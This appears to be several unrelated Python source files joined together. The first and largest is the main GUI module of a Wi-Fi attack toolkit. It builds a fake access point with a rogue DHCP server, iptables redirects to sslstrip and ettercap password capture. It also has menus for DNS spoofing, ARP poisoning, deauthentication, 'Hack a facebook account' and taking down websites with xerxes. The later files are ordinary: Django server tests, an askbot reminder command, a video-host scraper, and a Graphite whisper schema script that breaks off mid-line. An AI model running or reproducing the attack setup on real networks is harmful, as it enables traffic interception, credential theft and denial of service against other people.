btn_dhcpStar = QAction("DHCP S. Attack",self)
btn_dhcpStar.setShortcut("Ctrl+H")
btn_dns = QAction("DNS Spoof M.",self)
btn_dns.setShortcut("Ctrl+T")
btn_winup = QAction("Windows Update Attack ",self)
btn_winup.setShortcut("Ctrl+N")
btn_arp = QAction("Arp Posion Attack",self)
btn_arp.setShortcut("ctrl+Q")
#icons Modules
action_settings.setIcon(QIcon("rsc/setting.png"))
btn_arp.setIcon(QIcon("rsc/arp_.png"))
btn_winup.setIcon(QIcon("rsc/arp.png"))
btn_dns.setIcon(QIcon("rsc/dns.png"))
btn_dhcpStar.setIcon(QIcon("rsc/dhcp.png"))
btn_ip_list.setIcon(QIcon("rsc/scan.png"))
btn_mac.setIcon(QIcon("rsc/mac.png"))
btn_probe.setIcon(QIcon("rsc/probe.png"))
btn_deauth.setIcon(QIcon("rsc/deauth.png"))
# icons tools
dns_spoof.setIcon(QIcon("rsc/dns_spoof.png"))
ettercap.setIcon(QIcon("rsc/ettercap.png"))
ssl.setIcon(QIcon("rsc/ssl.png"))
etter_conf.setIcon(QIcon("rsc/etter.png"))
btn_drift.setIcon(QIcon("rsc/capture.png"))
btn_probe.triggered.connect(self.showProbe)
btn_deauth.triggered.connect(self.newwindow)
btn_mac.triggered.connect(self.form_mac)
btn_ip_list.triggered.connect(self.form_list)
btn_dhcpStar.triggered.connect(self.show_dhcpDOS)
btn_dns.triggered.connect(self.show_dnsManager)
btn_winup.triggered.connect(self.show_windows_update)
btn_arp.triggered.connect(self.show_arp_posion)
Menu_module.addAction(btn_deauth)
Menu_module.addAction(btn_probe)
Menu_module.addAction(btn_mac)
Menu_module.addAction(btn_ip_list)
Menu_module.addAction(btn_dhcpStar)
Menu_module.addAction(btn_dns)
Menu_module.addAction(btn_winup)
Menu_module.addAction(btn_arp)
Menu_module.addAction(action_settings)
Menu_peh_toolkit = self.myQMenuBar.addMenu("&PEH-toolkit")
btn_tutorial = QAction("PEH-toolkit-Tutorial", self)
btn_ping = QAction("Start a ping your target", self)
btn_whois = QAction("Start a whois search",self)
btn_dork3r = QAction("Dork3r vuln analizer", self)
btn_sqlmap = QAction("SQLMAP", self)
btn_hackfacebook = QAction("Hack a facebook account",self)
btn_wifite = QAction("Hack wpe/wpa wifi",self)
btn_apf = QAction("Find the admin page control",self)
btn_nmap = QAction("Launched a scan whit NMAP",self)
btn_theharvester = QAction("Identify different domain and different emails",self)
btn_fierce = QAction("Retrieve information about the dns",self)
btn_footprint = QAction("<<<<Hackerbolt Ultimate Footprint>>>>>",self)
btn_xerxes = QAction("Shutdown a web site / xerxes tool",self)
btn_tutorial.triggered.connect(self.start_tutorial)
btn_ping.triggered.connect(self.start_ping)
btn_whois.triggered.connect(self.start_whois)
btn_dork3r.triggered.connect(self.start_dork3r)
btn_sqlmap.triggered.connect(self.start_sqlmap)
btn_hackfacebook.triggered.connect(self.start_hackfacebook)
btn_wifite.triggered.connect(self.start_wifite)
btn_apf.triggered.connect(self.start_apf)
btn_nmap.triggered.connect(self.start_nmap)
btn_theharvester.triggered.connect(self.start_theharvester)
btn_fierce.triggered.connect(self.start_fierce)
btn_footprint.triggered.connect(self.start_footprint)
btn_xerxes.triggered.connect(self.start_xerxes)
Menu_peh_toolkit.addAction(btn_tutorial)
Menu_peh_toolkit.addAction(btn_ping)
Menu_peh_toolkit.addAction(btn_whois)
Menu_peh_toolkit.addAction(btn_dork3r)
Menu_peh_toolkit.addAction(btn_sqlmap)
Menu_peh_toolkit.addAction(btn_hackfacebook)
Menu_peh_toolkit.addAction(btn_wifite)
Menu_peh_toolkit.addAction(btn_apf)
Menu_peh_toolkit.addAction(btn_nmap)
Menu_peh_toolkit.addAction(btn_theharvester)
Menu_peh_toolkit.addAction(btn_fierce)
Menu_peh_toolkit.addAction(btn_footprint)
Menu_peh_toolkit.addAction(btn_xerxes)
Menu_extra= self.myQMenuBar.addMenu("&Extra")
Menu_about = QAction("About",self)
Menu_help = QAction("Help",self)
Menu_update = QAction("Update",self)
#icons extra
Menu_about.setIcon(QIcon("rsc/about.png"))
Menu_help.setIcon(QIcon("rsc/report.png"))
Menu_update.setIcon(QIcon("rsc/update.png"))
Menu_about.triggered.connect(self.about)
Menu_update.triggered.connect(self.show_update)
Menu_extra.addAction(Menu_update)
Menu_extra.addAction(Menu_about)
self.input_gw = QLineEdit(self)
self.input_AP = QLineEdit(self)
self.input_canal = QLineEdit(self)
self.w = QComboBox(self)
self.mod_import = frm_dhcp_Attack()
self.config.xmlSettings("local0","ipaddress",str(self.mod_import.get_ip_local(None)),False)
gw = self.module_arp.get_geteway()
if gw != None:
self.config.xmlSettings("local1","gateway",gw[0],False)
x = self.config.xmlSettings("local1", "gateway",None,False)
self.input_gw.setText(x)
self.input_gw.setText("192.168.1.0 / dsldevice.lan")
self.input_AP.setText("Free Wifi fake Network")
self.input_canal.setText("11")
n = self.mod_import.placa()
for i,j in enumerate(n):
if search("wlan", j):
self.w.addItem(n[i])
if not path.isfile("Modules/Win-Explo/Windows_Update/Settins_WinUpdate.html"):
system("cp Settings/source.tar.gz Modules/Win-Explo/")
system('cd Modules/Win-Explo/ && tar -xf source.tar.gz')
remove("Modules/Win-Explo/source.tar.gz")
driftnet = popen("which driftnet").read().split("\n")
ettercap = popen("which ettercap").read().split("\n")
sslstrip = popen("which sslstrip").read().split("\n")
xterm = popen("which xterm").read().split("\n")
dhcpd = popen("which dhcpd").read().split("\n")
lista = [ "/usr/sbin/airbase-ng", ettercap[0], sslstrip[0],xterm[0],driftnet[0]]
self.m = []
for i in lista:
self.m.append(path.isfile(i))
self.form = QFormLayout()
hLine = QFrame()
hLine.setFrameStyle(QFrame.HLine)
hLine.setSizePolicy(QSizePolicy.Minimum,QSizePolicy.Expanding)
hLine2 = QFrame()
hLine2.setFrameStyle(QFrame.HLine)
hLine2.setSizePolicy(QSizePolicy.Minimum,QSizePolicy.Expanding)
vbox = QVBoxLayout()
vbox.setMargin(5)
vbox.addStretch(20)
self.form.addRow(vbox)
self.logo = QPixmap(getcwd() + "/rsc/logo.jpg")
self.label_imagem = QLabel()
self.label_imagem.setPixmap(self.logo)
self.form.addRow(self.label_imagem)
self.form.addRow("Gateway/IP:", self.input_gw)
self.form.addRow("Fake Network Name:", self.input_AP)
self.form.addRow("Channel:", self.input_canal)
self.form.addRow("Network Card List:", self.w)
# grid network adapter fix
self.btrn_refresh = QPushButton("Refresh")
self.btrn_refresh.setIcon(QIcon("rsc/refresh.png"))
self.btrn_refresh.clicked.connect(self.refrash_interface)
self.grid = QGridLayout()
self.grid.addWidget(QLabel("Network Adapter:"),0,0)
self.grid.addWidget(self.w, 0,1)
self.grid.addWidget(self.btrn_refresh,0,2)
self.btn_start_attack = QPushButton("Start Attack", self)
self.btn_start_attack.setIcon(QIcon("rsc/start.png"))
self.btn_start_attack.setFixedWidth(160)
self.btn_cancelar = QPushButton("Stop Attack", self)
self.btn_cancelar.setIcon(QIcon("rsc/Stop.png"))
self.btn_cancelar.setFixedWidth(165)
self.btn_cancelar.clicked.connect(self.kill)
self.btn_start_attack.clicked.connect(self.start_air)
self.dialogTextBrowser = frm_window(self)
self.form2 = QFormLayout()
self.form2.addRow(self.btn_start_attack, self.btn_cancelar)
self.listbox = QListWidget(self)
self.listbox.setFixedHeight(200)
self.form2.addRow(self.listbox)
self.Main.addLayout(self.form)
self.Main.addLayout(self.grid)
self.Main.addLayout(self.form2)
self.setLayout(self.Main)
def start_tutorial(self):
if self.m[1] != False:
system("sudo xterm -geometry 80x45-1+250 tutorial ")
def start_ping(self):
if self.m[1] != False:
system("sudo xterm -geometry 80x25-1+250 ping ")
def start_whois(self):
if self.m[2] != False:
system("sudo xterm -geometry 80x25-1+250 PEHwhois")
def start_dork3r(self):
if self.m[1] != False:
system("sudo xterm -geometry 80x25-1+250 dork3r")
def start_sqlmap(self):
if self.m[4] != False:
system("sudo xterm -geometry 80x25-1+250 PEHsqlmap")
def start_hackfacebook(self):
if self.m[1] != False:
system("sudo xterm -geometry 80x25-1+250 facebook")
def start_wifite(self):
if self.m[2] != False:
system("sudo xterm -geometry 80x25-1+250 wifite")
def start_apf(self):
if self.m[1] != False:
system("sudo xterm -geometry 80x25-1+250 APF")
def start_nmap(self):
if self.m[4] != False:
system("sudo xterm -geometry 80x25-1+250 PEHnmap")
def start_theharvester(self):
if self.m[1] != False:
system("sudo xterm -geometry 80x25-1+250 PEHtheharvester")
def start_fierce(self):
if self.m[4] != False:
system("sudo xterm -geometry 80x25-1+250 PEHfierce")
def start_footprint(self):
if self.m[4] != False:
system("sudo xterm -geometry 80x25-1+250 footprint")
def start_xerxes(self):
if self.m[4] != False:
system("sudo xterm -geometry 80x25-1+250 xerxes")
def show_update(self):
self.n = frm_Update()
self.n.show()
def show_arp_posion(self):
self.n = frm_Arp_Poison()
self.n.setGeometry(0, 0, 450, 300)
self.n.show()
def show_settings(self):
self.n = frm_Settings()
self.n.show()
def show_windows_update(self):
self.n = frm_update_attack()
self.n.setGeometry(QRect(100, 100, 450, 300))
self.n.show()
def show_dnsManager(self):
self.n = frm_dnsspoof()
self.n.setGeometry(QRect(100, 100, 450, 200))
self.n.show()
def show_dhcpDOS(self):
self.n = frm_dhcp_main()
self.n.setGeometry(QRect(100, 100, 450, 200))
self.n.show()
def showProbe(self):
self.p = frm_PMonitor()
self.p.setGeometry(QRect(100, 100, 350, 200))
self.p.show()
def newwindow(self):
self.w = frm_window()
self.w.setGeometry(QRect(100, 100, 200, 200))
self.w.show()
def form_mac(self):
self.w = frm_mac_generator()
self.w.setGeometry(QRect(100, 100, 300, 100))
self.w.show()
def form_list(self):
self.w = frm_GetIP()
self.w.setGeometry(QRect(100, 100, 450, 300))
self.w.show()
def refrash_interface(self):
self.w.clear()
n = self.mod_import.placa()
for i,j in enumerate(n):
if search("wlan", j):
self.w.addItem(n[i])
def kill(self):
nano = ["echo \"0\" > /proc/sys/net/ipv4/ip_forward","iptables --flush", "iptables --table nat --flush" ,\
"iptables --delete-chain", "iptables --table nat --delete-chain", \
"airmon-ng stop wlan0mon && airmon-ng stop wlan1mon && airmon-ng stop wlan2mon" , "rm Settings/confiptables.sh" , \
"ifconfig lo down","ifconfig at0 down &"]
for delete in nano:
system(delete)
self.listbox.clear()
system("killall xterm")
QMessageBox.information(self,"Clear Setting", "Log CLear success ")
system("clear")
def start_etter(self):
if self.m[1] != False:
system("sudo xterm -geometry 73x25-1+50 -T ettercap -s -sb -si +sk -sl 5000 -e ettercap -p -u -T -q -w passwords -i lo & ettercapid=$!")
def start_ssl(self):
if self.m[2] != False:
system("sudo xterm -geometry 75x15+1+200 -T sslstrip -e sslstrip -f -k -l 10000 & sslstripid=$!")
def start_dns(self):
if self.m[1] != False:
system("sudo xterm -geometry 73x25-1+250 -T DNSSpoof -e ettercap -P dns_spoof -T -q -M arp // // -i lo & dnscapid=$!")
def start_dift(self):
if self.m[4] != False:
system("sudo xterm -geometry 75x15+1+200 -T DriftNet -e driftnet -i lo & driftnetid=$!")
def configure(self):
self.listbox.addItem("{+} Setting dhcpd Server...")
self.configuradhcp = open("Settings/dhcpd.conf","w")
self.configuradhcp.write("""authoritative;
default-lease-time 600;
max-lease-time 7200;
subnet 10.0.0.0 netmask 255.255.255.0 {
option routers 10.0.0.1;
option subnet-mask 255.255.255.0;
option domain-name "%s";
option domain-name-servers 10.0.0.1;
range 10.0.0.20 10.0.0.50;
}"""%(self.input_AP.text()))
self.listbox.addItem("{+} Configure Network Fake Dhcp...")
if path.isfile("/etc/dhcp/dhcpd.conf"):
system("rm /etc/dhcp/dhcpd.conf")
move("Settings/dhcpd.conf", "/etc/dhcp/")
else:
move("Settings/dhcpd.conf", "/etc/dhcp/")
self.listbox.addItem("{+} Setting interface lo Network...")
self.conf_iptables = open("Settings/confiptables.sh", "w")
self.conf_iptables.write("""echo "[+] Setting iptables..."
ifconfig lo up
ifconfig at0 up &
sleep 1
ifconfig lo 10.0.0.1 netmask 255.255.255.0
ifconfig lo mtu 1400
route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
echo 1 > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A PREROUTING -p udp -j DNAT --to %s
iptables -P FORWARD ACCEPT
iptables --append FORWARD --in-interface lo -j ACCEPT
iptables --table nat --append POSTROUTING --out-interface %s -j MASQUERADE
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
iptables --table nat -A PREROUTING -p tcp --dport 80 -j DNAT --to-destination %s
iptables -t nat -A POSTROUTING -j MASQUERADE
echo "[+] Startup DHCP..."
touch /var/run/dhcpd.pid
sudo dhcpd -d -f -cf \"/etc/dhcp/dhcpd.conf\" lo
sleep 3
"""%(self.input_gw.text(),self.w.currentText(),str(self.mod_import.get_ip_local(None))))
self.conf_iptables.close()
self.listbox.addItem("{+} Add Getway Interface DNET...")
self.listbox.addItem("{+} SET POSTROUTING MASQUEREDE...")
self.listbox.addItem("{+} Add REDIRECT port 10000 Iptables...")
self.listbox.addItem("{+} IPtables Set with success...")
system("chmod +x Settings/confiptables.sh")
system("xterm -geometry 75x15+1+250 -e 'bash -c \"./Settings/confiptables.sh; exec bash\"' & configure=$!")
self.configuradhcp.close()
def start_air(self):
dot = 1
self.listbox.clear()
if self.w.currentText() == "":
QMessageBox.information(self,"Error", "Network interface not supported :(")
else:
if path.exists("Settings/"):
print(":::")
if not geteuid() == 0:
QMessageBox.information(self, "Permission Denied", 'the Tool must be run as root try again.')
dot = 0
else:
mkdir("Settings")
dot = 0
if dot == 1:
system("airmon-ng start %s" %(self.w.currentText()))
self.listbox.addItem("{+} Start airmon-ng %s"%self.w.currentText())
system("sudo xterm -geometry 75x15+1+0 -T \"Fake AP - %s - Statup\" -e airbase-ng -c %s -e \"%s\" %s & fakeapid=$!"""%(self.interface,self.input_canal.text(),self.input_AP.text(),self.interface))
sleep(5)
self.configure()
self.listbox.addItem("{+} Done")
def Edit_etter(self):
n = dist()
if n[0] == "Ubuntu":
system("xterm -e nano /etc/ettercap/etter.dns")
elif n[0] == "debian":
system("xterm -e nano /etc/ettercap/etter.dns")
else:
QMessageBox.information(self,"Error", "Path etter.dns not found")
def create_sys_tray(self):
self.sysTray = QSystemTrayIcon(self)
self.sysTray.setIcon(QIcon('rsc/icon.jpg'))
self.sysTray.setVisible(True)
self.connect(self.sysTray, SIGNAL("activated(QSystemTrayIcon::ActivationReason)"), self.on_sys_tray_activated)
self.sysTrayMenu = QMenu(self)
act = self.sysTrayMenu.addAction("FOO")
def on_sys_tray_activated(self, reason):
if reason == 3:
self.showNormal()
elif reason == 2:
self.showMinimized()
def about(self):
QMessageBox.about(self, self.tr("About PEH-wifi-attack"),
self.tr(
"Author:%s\n"
"Version:%s\n"
"The MIT License (MIT)\n"
"Emails of the Author: \np0cL4bs@gmail.com\n"
"mh4root@gmail.com\n\n"
"edited_by:%s\n"
"edited_version:%s\n"
"edited_date:%s\n"
"Emails: \nhackerbolt@outlook.com\n"
"hackerbolt@hotmail.com\n\n"
"Portuguese Ethical Hacker Academy (PEH)\n"
"Copyright(c) 2015\n"% ( __author__, __version__, __edited_by__, __edited_version__, __edited_date__ )))
| hackerbolt-freelancer/PEH-wifi-attack | Core/Main.py | Python | mit | 21,924 |
# -*- encoding: utf-8 -*-
"""
Tests for django.core.servers.
"""
from __future__ import unicode_literals
import os
import socket
from django.core.exceptions import ImproperlyConfigured
from django.test import LiveServerTestCase
from django.test.utils import override_settings
from django.utils.http import urlencode
from django.utils.six.moves.urllib.error import HTTPError
from django.utils.six.moves.urllib.request import urlopen
from django.utils._os import upath
from .models import Person
TEST_ROOT = os.path.dirname(upath(__file__))
TEST_SETTINGS = {
'MEDIA_URL': '/media/',
'MEDIA_ROOT': os.path.join(TEST_ROOT, 'media'),
'STATIC_URL': '/static/',
'STATIC_ROOT': os.path.join(TEST_ROOT, 'static'),
}
class LiveServerBase(LiveServerTestCase):
available_apps = [
'servers',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
]
fixtures = ['testdata.json']
urls = 'servers.urls'
@classmethod
def setUpClass(cls):
# Override settings
cls.settings_override = override_settings(**TEST_SETTINGS)
cls.settings_override.enable()
super(LiveServerBase, cls).setUpClass()
@classmethod
def tearDownClass(cls):
# Restore original settings
cls.settings_override.disable()
super(LiveServerBase, cls).tearDownClass()
def urlopen(self, url):
return urlopen(self.live_server_url + url)
class LiveServerAddress(LiveServerBase):
"""
Ensure that the address set in the environment variable is valid.
Refs #2879.
"""
@classmethod
def setUpClass(cls):
# Backup original environment variable
address_predefined = 'DJANGO_LIVE_TEST_SERVER_ADDRESS' in os.environ
old_address = os.environ.get('DJANGO_LIVE_TEST_SERVER_ADDRESS')
# Just the host is not accepted
cls.raises_exception('localhost', ImproperlyConfigured)
# The host must be valid
cls.raises_exception('blahblahblah:8081', socket.error)
# The list of ports must be in a valid format
cls.raises_exception('localhost:8081,', ImproperlyConfigured)
cls.raises_exception('localhost:8081,blah', ImproperlyConfigured)
cls.raises_exception('localhost:8081-', ImproperlyConfigured)
cls.raises_exception('localhost:8081-blah', ImproperlyConfigured)
cls.raises_exception('localhost:8081-8082-8083', ImproperlyConfigured)
# If contrib.staticfiles isn't configured properly, the exception
# should bubble up to the main thread.
old_STATIC_URL = TEST_SETTINGS['STATIC_URL']
TEST_SETTINGS['STATIC_URL'] = None
cls.raises_exception('localhost:8081', ImproperlyConfigured)
TEST_SETTINGS['STATIC_URL'] = old_STATIC_URL
# Restore original environment variable
if address_predefined:
os.environ['DJANGO_LIVE_TEST_SERVER_ADDRESS'] = old_address
else:
del os.environ['DJANGO_LIVE_TEST_SERVER_ADDRESS']
@classmethod
def tearDownClass(cls):
# skip it, as setUpClass doesn't call its parent either
pass
@classmethod
def raises_exception(cls, address, exception):
os.environ['DJANGO_LIVE_TEST_SERVER_ADDRESS'] = address
try:
super(LiveServerAddress, cls).setUpClass()
raise Exception("The line above should have raised an exception")
except exception:
pass
finally:
super(LiveServerAddress, cls).tearDownClass()
def test_test_test(self):
# Intentionally empty method so that the test is picked up by the
# test runner and the overriden setUpClass() method is executed.
pass
class LiveServerViews(LiveServerBase):
def test_404(self):
"""
Ensure that the LiveServerTestCase serves 404s.
Refs #2879.
"""
try:
self.urlopen('/')
except HTTPError as err:
self.assertEqual(err.code, 404, 'Expected 404 response')
else:
self.fail('Expected 404 response')
def test_view(self):
"""
Ensure that the LiveServerTestCase serves views.
Refs #2879.
"""
f = self.urlopen('/example_view/')
self.assertEqual(f.read(), b'example view')
def test_static_files(self):
"""
Ensure that the LiveServerTestCase serves static files.
Refs #2879.
"""
f = self.urlopen('/static/example_static_file.txt')
self.assertEqual(f.read().rstrip(b'\r\n'), b'example static file')
def test_media_files(self):
"""
Ensure that the LiveServerTestCase serves media files.
Refs #2879.
"""
f = self.urlopen('/media/example_media_file.txt')
self.assertEqual(f.read().rstrip(b'\r\n'), b'example media file')
def test_environ(self):
f = self.urlopen('/environ_view/?%s' % urlencode({'q': 'тест'}))
self.assertIn(b"QUERY_STRING: 'q=%D1%82%D0%B5%D1%81%D1%82'", f.read())
class LiveServerDatabase(LiveServerBase):
def test_fixtures_loaded(self):
"""
Ensure that fixtures are properly loaded and visible to the
live server thread.
Refs #2879.
"""
f = self.urlopen('/model_view/')
self.assertEqual(f.read().splitlines(), [b'jane', b'robert'])
def test_database_writes(self):
"""
Ensure that data written to the database by a view can be read.
Refs #2879.
"""
self.urlopen('/create_model_instance/')
self.assertQuerysetEqual(
Person.objects.all().order_by('pk'),
['jane', 'robert', 'emily'],
lambda b: b.name
)
| atruberg/django-custom | tests/servers/tests.py | Python | bsd-3-clause | 5,773 |
import datetime
from django.core.management.base import NoArgsCommand
from django.conf import settings as django_settings
from askbot import models
from askbot import const
from askbot.conf import settings as askbot_settings
from django.utils.translation import ugettext as _
from django.utils.translation import ungettext
from askbot import mail
from askbot.utils.classes import ReminderSchedule
from askbot.skins.loaders import get_template
from django.template import Context
DEBUG_THIS_COMMAND = False
class Command(NoArgsCommand):
def handle_noargs(self, **options):
if askbot_settings.ENABLE_EMAIL_ALERTS == False:
return
if askbot_settings.ENABLE_ACCEPT_PROBLEM_REMINDERS == False:
return
#get exercises without problems, excluding closed and deleted
#order it by descending added_at date
schedule = ReminderSchedule(
askbot_settings.DAYS_BEFORE_SENDING_ACCEPT_PROBLEM_REMINDER,
askbot_settings.ACCEPT_PROBLEM_REMINDER_FREQUENCY,
askbot_settings.MAX_ACCEPT_PROBLEM_REMINDERS
)
exercises = models.Post.objects.get_exercises().exclude(
deleted = True
).added_between(
start = schedule.start_cutoff_date,
end = schedule.end_cutoff_date
).filter(
thread__problem_count__gt = 0
).filter(
thread__accepted_problem__isnull=True #problem_accepted = False
).order_by('-added_at')
#for all users, excluding blocked
#for each user, select a tag filtered subset
#format the email reminder and send it
for user in models.User.objects.exclude(status = 'b'):
user_exercises = exercises.filter(author = user)
final_exercise_list = user_exercises.get_exercises_needing_reminder(
activity_type = const.TYPE_ACTIVITY_ACCEPT_PROBLEM_REMINDER_SENT,
user = user,
recurrence_delay = schedule.recurrence_delay
)
#todo: rewrite using query set filter
#may be a lot more efficient
exercise_count = len(final_exercise_list)
if exercise_count == 0:
continue
subject_line = _(
'Accept the best problem for %(exercise_count)d of your exercises'
) % {'exercise_count': exercise_count}
#todo - make a template for these
if exercise_count == 1:
reminder_phrase = _('Please accept the best problem for this exercise:')
else:
reminder_phrase = _('Please accept the best problem for these exercises:')
data = {
'site_url': askbot_settings.APP_URL,
'exercises': final_exercise_list,
'reminder_phrase': reminder_phrase
}
template = get_template('email/accept_problem_reminder.html')
body_text = template.render(Context(data))
if DEBUG_THIS_COMMAND:
print "User: %s<br>\nSubject:%s<br>\nText: %s<br>\n" % \
(user.email, subject_line, body_text)
else:
mail.send_mail(
subject_line = subject_line,
body_text = body_text,
recipient_list = (user.email,)
)
| maxwward/SCOPEBak | askbot/management/commands/send_accept_problem_reminders.py | Python | gpl-3.0 | 3,650 |
# -*- coding: utf-8 -*-
#------------------------------------------------------------
# seriesly - XBMC Plugin
# Conector para nowdownload
# http://blog.tvalacarta.info/plugin-xbmc/seriesly/
#------------------------------------------------------------
import urlparse,urllib2,urllib,re
import os
from core import scrapertools
from core import logger
from core import config
def test_video_exists( page_url ):
return True,""
def get_video_url( page_url , premium = False , user="" , password="", video_password="" ):
logger.info("[nowdownload.py] get_video_url (page_url='%s')" % page_url)
'''
<a href="http://f02.nowdownload.co/dl/91efaa9ec507ef4de023cd62bb9a0fe2/50ab76ac/6711c9c90ebf3_family.guy.s11e02.italian.subbed.hdtv.xvid_gannico.avi" class="btn btn-danger"><i class="icon-white icon-download"></i> Download Now</a>
'''
data = scrapertools.cache_page( page_url )
logger.debug("[nowdownload.py] data:" + data)
try:
url = scrapertools.get_match(data,'<a href="([^"]*)" class="btn btn-danger"><i class="icon-white icon-download"></i> Download Now</a>')
except:
#$.get("/api/token.php?token=7e1ab09df2775dbea02506e1a2651883");
token = scrapertools.get_match(data,'(/api/token.php\?token=[^"]*)')
logger.debug("[nowdownload.py] token:" + token)
d= scrapertools.cache_page( "http://www.nowdownload.co"+ token )
url = scrapertools.get_match(data,'expiryText: \'<a class="btn btn-danger" href="([^"]*)')
logger.debug("[nowdownload.py] url_1:" + url)
data = scrapertools.cache_page("http://www.nowdownload.co" + url )
logger.debug("[nowdownload.py] data:" + data)
#<a href="http://f03.nowdownload.co/dl/8ec5470153bb7a2177847ca7e1638389/50ab71b3/f92882f4d33a5_squadra.antimafia_palermo.oggi.4x01.episodio.01.ita.satrip.xvid_upz.avi" class="btn btn-success">Click here to download !</a>
url = scrapertools.get_match(data,'<a href="([^"]*)" class="btn btn-success">Click here to download !</a>')
logger.debug("[nowdownload.py] url_final:" + url)
video_urls = [url]
return video_urls
# Encuentra vídeos del servidor en el texto pasado
def find_videos(data):
encontrados = set()
devuelve = []
#http://www.nowdownload.co/dl/9gwahc3577hj9
#http://www.nowdownload.eu/dl/srv4g94wk6j7b
patronvideos = '(nowdownload.\w{2}/dl/[a-z0-9]+)'
logger.info("[nowdownload.py] find_videos #"+patronvideos+"#")
matches = re.compile(patronvideos,re.DOTALL).findall(data)
for match in matches:
titulo = "[nowdownload]"
url = "http://www."+match
if url not in encontrados:
logger.info(" url="+url)
devuelve.append( [ titulo , url , 'nowdownload' ] )
encontrados.add(url)
else:
logger.info(" url duplicada="+url)
return devuelve
| conejoninja/xbmc-seriesly | servers/nowdownload.py | Python | gpl-3.0 | 2,851 |
#!/usr/bin/env python
# @package update_storage_schemas.py
# Correct/Update storage schemas\n
# @code
# # Usage example for update_storage_schemas.py
# sudo ./update_storage_schemas.py --path /opt/graphite/whisper --cfg /opt/graphite/conf/schemas
# @endcode
import sys
import os
import logging
import subprocess
import argparse
import re
import time
from multiprocessing import Pool, cpu_count
from configobj import ConfigObj
# Assuming Python 2, we'll want scandir if possible, it's much faster
try:
from scandir import scandir
except ImportError:
from os import listdir as scandir
LOG = logging.getLogger()
LOG.setLevel(logging.INFO)
SCHEMA_LIST = {}
# The very basic default retentions
DEFAULT_SCHEMA = {'match': re.compile('.*'),
'retentions': '1m:7d'}
DEBUG = False
DRY_RUN = False
ROOT_PATH = ""
def config_schemas(cfg):
schema_conf = ConfigObj(cfg)
for schema in schema_conf.items():
item = schema[1]['pattern']
if item == '.*':
DEFAULT_SCHEMA['retentions'] = schema[1]['retentions']
else:
if item[0] == '^':
item = item[1:]
SCHEMA_LIST[item] = {'retentions': schema[1]['retentions'],
'match': re.compile(item)}
def _convert_seconds(time):
seconds_dict = {'s': 1, 'm': 60, 'h': 3600, 'min': 60,
'd': 86400, 'w': 604800, 'y': 31536000}
(points, time) = time.split(':')
if str.isalpha(time[-1]):
time = int(time[:-1]) * seconds_dict[time[-1]]
return time
def _compare_retention(retention, tmp_path):
# Get the new retention as [(secondsPerPoint, numPoints), ...]
new_retention = [_convert_seconds(item) for item in list(retention)]
info_string = [INFO_BIN, tmp_path]
cur_ret_list = subprocess.Popen(info_string, stdout=subprocess.PIPE)
cur_ret_list = cur_ret_list.communicate()[0].split('\n')
cur_retention = [int(line.split(':')[1]) for line in cur_ret_list
if 'retention' in line]
return cur_retention == new_retention
def _find_metrics(path):
for f in scandir(path):
if f.is_dir(follow_symlinks=False):
for sf in _find_metrics(f.path):
yield sf
else:
if not f.is_file(follow_symlinks=False) or \
not f.name.endswith('.wsp'):
continue
yield f.path
def fix_metric(metric):
if not SCHEMA_LIST:
LOG.error("Didn't initialize schemas!")
return []
if DEBUG:
LOG.info("Testing %s for modification" % metric)
devnull = open(os.devnull, 'w')
command_string = list(BASE_COMMAND) + [metric]
retention = DEFAULT_SCHEMA['retentions']
matching = metric[len(ROOT_PATH):].replace('/', '.')
for schema, info in SCHEMA_LIST.iteritems():
if info['match'].search(matching):
retention = info['retentions']
break
command_string.extend(list(retention))
if DEBUG:
LOG.info("Created command: %s" % command_string)
if _compare_retention(retention, metric):
LOG.debug('%s has the same retention as before!' % metric)
return [(False, metric)]
if DRY_RUN:
res = 0
else:
LOG.debug('Retention will be %s' % retention)
# record file owner/group and perms to set properly after whisper-resize.py is complete
st = os.stat(metric)
if DEBUG:
res = subprocess.check_call(command_string)
else:
res = subprocess.check_call(command_string,
stdout=devnull)
os.chmod(metric, st.st_mode)
os.chown(metric, st.st_uid, st.st_gid)
devnull.close()
# wait for a second, so we don't kill I/O on the host
time.sleep(SLEEP)
"""
We have manual commands for every failed file from these
errors, so we can just go through each of these errors
after a completed run. There shouldn't be many
"""
if res != 0:
LOG.error('Failed to update schemas for %s' % metric)
LOG.error('Attempted retention: %s' % retention)
LOG.error('Attempted command string: %s' % command_string)
return [(False, metric)]
else:
return [(True, metric)]
def search_and_fix(subdir):
if not SCHEMA_LIST:
LOG.error("Didn't initialize schemas!")
return
fpath = os.path.join(ROOT_PATH, subdir)
pool = Pool(cpu_count())
LOG.info('Creating new storage schemas for metrics under %s ...' % fpath)
results = pool.map(fix_metric, _find_metrics(fpath), 100)
pool.close()
pool.join()
return results
# Parse command line options sent to the script
def cli_opts():
parser = argparse.ArgumentParser("Correct storage settings on multiple whisper files")
parser.add_argument('--cfg', action='store', dest='cfg',
help='The storage-schemas.conf file path',
required=True)
parser.add_argument('--path', action='store', dest='path',
help='The root path to find metrics in',
required=True)
parser.add_argument('--debug', action='store_true', dest='debug',
help='Display debug information',
default=False)
parser.add_argument('--dry-run', action='store_true', dest='dry_run',
help="Don't actually do anything",
default=False)
parser.add_argument('--subdir', action='store', dest='subdir',
help="If you only want to process a particular subdir",
default='')
parser.add_argument('--nobackup', action='store_true', dest='nobackup',
help="Passed through to whisper-resize.py, don't create a backup",
default=False)
parser.add_argument('--aggregate', action='store_true', dest='aggregate',
help="Passed through to whisper-resize.py, roll up values",
default=False)
parser.add_argument('--bindir', action='store', dest='bindir',
help="The root path to whisper-resize.py and whisper-info.py",
default='/opt/graphite/bin')
parser.add_argument('--sleep', action='store', dest='sleep',
help="Sleep this amount of time in seconds between metric comparisons",
default=0.3)
return parser.parse_args()
if __name__ == '__main__':
i_args = cli_opts()
if os.getenv('USER') != 'root':
print("You must run this script as root!")
sys.exit(1)
if i_args.debug:
LOG.setLevel(logging.DEBUG)
soh = logging.StreamHandler(sys.stdout)
LOG.addHandler(soh)
ROOT_PATH = i_args.path
DEBUG = i_args.debug
DRY_RUN = i_args.dry_run
BINDIR = i_args.bindir
SLEEP = i_args.sleep
RESIZE_BIN = BINDIR + "/whisper-resize.py"
INFO_BIN = BINDIR + "/whisper-info.py"
BASE_COMMAND = [RESIZE_BIN]
if i_args.nobackup:
